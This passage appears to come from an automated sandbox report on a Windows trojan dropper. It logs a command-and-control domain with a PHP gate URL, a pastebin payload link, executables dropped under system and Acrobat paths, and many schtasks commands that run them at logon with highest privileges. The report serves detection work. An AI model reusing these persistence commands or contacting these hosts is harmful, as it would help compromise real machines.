            Source: global trafficDNS traffic detected: DNS query: romangw5.beget.tech
            Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
            Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://romangw5.beget.tech
            Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://romangw5.beget.tech/
            Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f
            Source: portruntime.exe, 00000005.00000002.1474905892.000000000300D000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
            Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/i8wetBiv
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49704 version: TLS 1.2

            System Summary

            barindex
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_0087718C
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exeJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Windows\Downloaded Program Files\be621495aa6c7bJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087857B0_2_0087857B
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008870BF0_2_008870BF
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089D00E0_2_0089D00E
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087407E0_2_0087407E
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008A11940_2_008A1194
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008732810_2_00873281
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087E2A00_2_0087E2A0
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008902F60_2_008902F6
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008866460_2_00886646
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008837C10_2_008837C1
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008727E80_2_008727E8
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089070E0_2_0089070E
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089473A0_2_0089473A
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087E8A00_2_0087E8A0
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_008949690_2_00894969
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087F9680_2_0087F968
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00883A3C0_2_00883A3C
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00886A7B0_2_00886A7B
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00890B430_2_00890B43
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089CB600_2_0089CB60
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00885C770_2_00885C77
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088FDFA0_2_0088FDFA
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087ED140_2_0087ED14
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00883D6D0_2_00883D6D
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087BE130_2_0087BE13
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087DE6C0_2_0087DE6C
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00875F3C0_2_00875F3C
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00890F780_2_00890F78
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: String function: 0088E28C appears 35 times
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: String function: 0088E360 appears 52 times
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: String function: 0088ED00 appears 31 times
            Source: portruntime.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: HuzhgkcqwYiFfxvhdfMUs.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: HuzhgkcqwYiFfxvhdfMUs.exe0.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: HuzhgkcqwYiFfxvhdfMUs.exe1.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: winlogon.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: HuzhgkcqwYiFfxvhdfMUs.exe2.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: QIKiV83Pkl.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs QIKiV83Pkl.exe
            Source: QIKiV83Pkl.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.evad.winEXE@39/22@2/2
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00876EC9 GetLastError,FormatMessageW,0_2_00876EC9
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_00889E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00889E1C
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exeJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\Default\conhost.exeJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeMutant created: \Sessions\1\BaseNamedObjects\Local\53353b0acecc245765fbbf262d53597803ae4f8c
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:120:WilError_03
            Source: C:\brokermonitordhcp\portruntime.exeFile created: C:\Users\user\AppData\Local\Temp\kxib6YnpdJJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCommand line argument: sfxname0_2_0088D5D4
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCommand line argument: sfxstime0_2_0088D5D4
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCommand line argument: STARTDLG0_2_0088D5D4
            Source: QIKiV83Pkl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: QIKiV83Pkl.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\brokermonitordhcp\portruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: QIKiV83Pkl.exeReversingLabs: Detection: 71%
            Source: QIKiV83Pkl.exeVirustotal: Detection: 59%
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeFile read: C:\Users\user\Desktop\QIKiV83Pkl.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\QIKiV83Pkl.exe "C:\Users\user\Desktop\QIKiV83Pkl.exe"
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\brokermonitordhcp\portruntime.exe "C:\brokermonitordhcp\portruntime.exe"
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
            Source: unknownProcess created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 5 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 9 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\brokermonitordhcp\portruntime.exe "C:\brokermonitordhcp\portruntime.exe"Jump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
